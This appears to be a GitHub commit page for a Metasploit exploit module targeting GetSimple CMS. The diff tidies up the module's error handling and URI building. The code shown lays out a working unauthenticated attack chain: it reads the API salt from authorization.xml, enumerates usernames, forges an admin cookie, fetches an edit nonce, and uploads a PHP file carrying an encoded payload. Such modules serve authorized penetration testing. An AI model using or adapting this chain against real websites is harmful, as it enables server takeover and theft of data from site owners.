Merge pull request #1 from space-r7/pr11802-changes

add checks to `at` functions that could result in error
rapid7 · May 15, 2019 · d3ae17f · d3ae17f
2 parents bd349b8 + 6210a28
commit d3ae17f
Showing 1 changed file with 24 additions and 16 deletions.
diff --git a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -53,35 +53,41 @@ def initialize(info={})
   def gscms_version
       res = send_request_cgi(
         'method' => 'GET',
-        'uri'    => "#{target_uri.path}/admin/"
+        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
       )
       return unless res && res.code == 200
 
       generator = res.get_html_document.at(
         '//script[@type = "text/javascript"]/@src'
         )
+
+      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
       vers = generator.value.split('?v=').last.gsub(".","")
       return unless vers
       @version = vers
   end
 
   def get_salt
-    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
     @salt = res.get_xml_document.at('apikey').text
   end
 
   def get_user
-    uri = normalize_uri(target_uri.path, '/data/users/')
+    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
     @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
   end
 
@@ -94,15 +100,17 @@ def gen_cookie(version,salt,username)
   end
   def get_nonce(cookie)
     res = send_request_cgi({
-    'method' => 'GET',
-    'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
-    'cookie' =>  cookie,
-    'vars_get' => {
-        't' => 'Innovation',
-        'f' => 'Default Template',
-        's' => 'Edit'
-    }
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
+      'cookie' =>  cookie,
+      'vars_get' => {
+          't' => 'Innovation',
+          'f' => 'Default Template',
+          's' => 'Edit'
+      }
     })
+
+    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
     @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
   end
 
@@ -111,11 +119,11 @@ def exploit
         fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
     end
     version = gscms_version
-    salt = get_salt()
-    username = get_user()
+    salt = get_salt
+    username = get_user
     cookie = gen_cookie(version,salt,username)
     nonce = get_nonce(cookie)
-    #fname = rand_text_alpha(rand(10)+6) + '.php'
+
     fname = "#{rand_text_alpha(6..16)}.php"
     php   = %Q|<?php #{payload.encoded} ?>|
     upload_file(cookie,nonce,fname,php)
@@ -138,14 +146,14 @@ def check
   end
 
   def vulnerable
-    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
 
-    uri = normalize_uri(target_uri.path, '/data/users/')
+    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri